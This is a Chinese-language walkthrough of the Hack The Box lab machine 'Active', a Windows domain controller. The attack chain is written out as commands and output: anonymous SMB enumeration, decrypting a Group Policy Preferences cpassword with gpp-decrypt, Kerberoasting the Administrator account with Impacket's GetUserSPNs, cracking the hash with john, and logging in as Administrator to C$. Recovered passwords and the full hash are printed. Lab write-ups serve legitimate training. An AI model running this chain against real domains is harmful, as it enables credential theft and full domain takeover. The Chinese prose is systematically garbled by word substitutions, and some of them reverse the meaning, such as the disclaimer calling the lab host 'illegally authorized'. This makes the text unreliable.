乐趣区

关于渗透测试:HTBActivesambaKerberoasting

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责

服务探测

查看开启端口服务

┌──(root💀kali)-[~/htb/Active]
└─# nmap -p- 10.10.10.100 --open
Starting Nmap 7.91 (https://nmap.org) at 2021-12-29 04:33 EST
Nmap scan report for 10.10.10.100
Host is up (0.30s latency).
Not shown: 65508 closed ports, 4 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 136.09 seconds

查看对应端口详细信息

┌──(root💀kali)-[~/htb/Active]
└─# nmap -sV -T4 -A -O -p 53,88,135,389,445,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49180 10.10.10.100
Starting Nmap 7.91 (https://nmap.org) at 2021-12-29 04:37 EST
Nmap scan report for 10.10.10.100
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-29 09:37:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49180/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-29T09:39:06
|_  start_date: 2021-12-29T09:31:20

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   283.07 ms 10.10.14.1
2   284.19 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.68 seconds

有流动目录还有 DNS,那这台应该是 DC 服务器

先从 samba 开始,枚举共享目录

┌──(root💀kali)-[~/htb/Active]
└─# smbmap -u '' -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

匿名账号只能够进入Replication

登录

──(root💀kali)-[~/htb/Active]
└─#  smbclient --no-pass //10.10.10.100/Replication                                                             1 ⨯
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

下载所有文件到本地待剖析

smb: \> recurse on
smb: \> prompt off
smb: \>  mget *

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml 爆出一个登录账号凭据

┌──(root💀kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName=""fullName="" description=""cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"changeLogon="0"noChange="1"neverExpires="1"acctDisabled="0"userName="active.htb\SVC_TGS"/></User>
</Groups>

用户名:active.htb\SVC_TGS
哈希:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

在谷歌搜寻 Groups.xml decrypt 找到这个文件的解密办法:gpp-decrypt

┌──(root💀kali)-[~/htb/Active]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

GPPstillStandingStrong2k18

解出明码为:GPPstillStandingStrong2k18

查看该账户 smb 权限

┌──(root💀kali)-[~/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

user.txt

应用上面命令登录 Users 文件夹

smbclient -U ‘active.htb/SVC_TGS%GPPstillStandingStrong2k18’ //10.10.10.100/Users

找到 user.txt

smb: \SVC_TGS\Desktop\> pwd
Current directory is \\10.10.10.100\Users\SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018

挂载分享目录

装置 cifs
apt install cifs-utils

把 Users 共享目录挂载到本地

mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/Users /mnt/users

进到 /mnt/users 目录,执行以下命令,列出所有可读文件
find . -ls -type f

顺次挂载 NETLOGON 和 SYSVOL 到本地

┌──(root💀kali)-[~/htb/Active]
└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/NETLOGON /mnt/NETLOGON
                                                                                                                                        
┌──(root💀kali)-[~/htb/Active]
└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/SYSVOL /mnt/SYSVOL

别离到 /mnt/NETLOGON/mnt/SYSVOL运行以下命令:
find ./|xargs grep -ri 'password' -l

找到一个和咱们下面找到的一样的文件

┌──(root💀kali)-[/mnt/SYSVOL]
└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml       123 ⨯
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName=""fullName="" description=""cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"changeLogon="0"noChange="1"neverExpires="1"acctDisabled="0"userName="active.htb\SVC_TGS"/></User>
</Groups>

除此以外没有其余有用的文件,看来 445 端口曾经没有有价值的货色

kerberos

留意到靶机开启了 kerberos 服务

当初咱们有了一个账号的信息,晓得了域的名称,能够应用 GetUserSPNs.py 获取票据

应用命令:
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

返回了 Administrator 的哈希明码

└─# python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS                              
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d5d94b46d32eed4359851547f776ab30$284fc8be86870c148fb7fd4e01df702eebce6191b5a587fedd331cd603c0bee0f4ff4d947d826c4a51af5f4de01a583aea555ce5d7d9710cafc8f8eb27d6a2ee56775cb5aca52c0511ecdf0dbd13f7325ce41d0c1fa014b2dffa17e3580b29f31bc2b847420f59abe6fb6463f9213396f13de461b4c2d1190abd036ece8ab8bf7b9728c67b412a8684acbe52404aed50b5537eb1f0d51e0ac038d66e60ac2d0ee4558e5dc9a4f258cf0c9c75f35d5bcab7ad6f697ec6433675df059cbb9a3dfd7d8d944d1595ad21a3c09ea49153774822a7a146f889274863de24645675bab649ff034fffbf36b74f3d7b04f0164750752842c63db26e52b539c1e21ecc75f114d76d0e31d0832e40a6eeec60e9356284dd242daf2327f532c959752437a3180db3e6df4bd8165f543d0b4d95e13908c8a974a568793b3b61271695edddd8c8362c355ab669be8ca1fbcbe80b6668e186e0700a4552fe1683597b271883a44144e2ffe06e35802e1d2c85c6d9f217218e86af1132d1315a6e047675b99c1115d0af4a52db2b48246230744980886e7f73442d0fed61e51efa19587d5f60fa319fadc9c9cc6ace7dcaeeeaed3668615b1ba6b7b48286542ded70ed6dd2858012fd1fd6f2427ba3c2b89f30b072134072bd02859e114bec3796bef12399603f80ceaaf909f9e70ed5c99e919b08d0383f1826804668d65318fcd4a624b9239558839722a519358972329c4e41311accf9e715f1be5c8c0ed07527d118e141d3601a92fa49461f399f106ff52790bef6612790841468864e5df127b1464332ff3bb481383c7ab7352eec5dc39175d46d2133173f9024421c4a65d5d04ded937a7bc6e5f77cb75aa848180a61e8dd9bba5790468b503709960b54eee9591766cdccbb864a1e3158c5a9b732a52ed3a07fef81d8409df1443ef5c8c195964a7ba2e617b4e1e3e1087ef20fa05f854fa05b07a7c3fcf66025204832f6607b6ce4a1dafb1cd549adeac90d6fc319d5fffca158080a4cb2c5a0a7b27f6ddc34e4039694f0d285628aa698d3e5800271b5f589261b979a5eece8d230345fdb2ce5046a0584ff09e22a2eb6ab4ca0e2f29cce6358680df9ff356a704b2630cb476dc5cf7cde997223b96707d0f3dbfd1324df999c91874d774e7ae10ff9f424f75c3e030f504e6abb2c0baf8b714f8aace32dc56a090f43d29a572cc3da6354a8562667575ddb591c4cae09059398c4f4a835a051a9dc4948859bb145bf67

保留到本地,应用 john 破解

┌──(root💀kali)-[~/htb/Active]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:05 DONE (2021-12-29 10:06) 0.1964g/s 2070Kp/s 2070Kc/s 2070KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
                                                                                                          
┌──(root💀kali)-[~/htb/Active]
└─# john --show hashes.kerberoast                                     
?:Ticketmaster1968

1 password hash cracked, 0 left

破解明码为:Ticketmaster1968

root.txt

Administrator:Ticketmaster1968 登录到 C 盘

┌──(root💀kali)-[~/htb/Active]
└─# smbclient -U 'active.htb/Administrator%Ticketmaster1968' //10.10.10.100/C$
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Mon Jul 13 22:34:39 2009
  Config.Msi                        DHS        0  Mon Jul 30 10:10:06 2018
  Documents and Settings          DHSrn        0  Tue Jul 14 01:06:44 2009
  pagefile.sys                      AHS 4294434816  Wed Dec 29 08:59:57 2021
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Wed Jul 18 14:44:51 2018
  Program Files (x86)                DR        0  Thu Jan 21 11:49:16 2021
  ProgramData                       DHn        0  Mon Jul 30 09:49:31 2018
  Recovery                         DHSn        0  Mon Jul 16 06:13:22 2018
  System Volume Information         DHS        0  Wed Jul 18 14:45:01 2018
  Users                              DR        0  Sat Jul 21 10:39:20 2018
  Windows                             D        0  Mon Jul 30 09:42:18 2018

拿到 root.txt

smb: \users\Administrator\desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                            A       34  Sat Jul 21 11:06:07 2018

退出移动版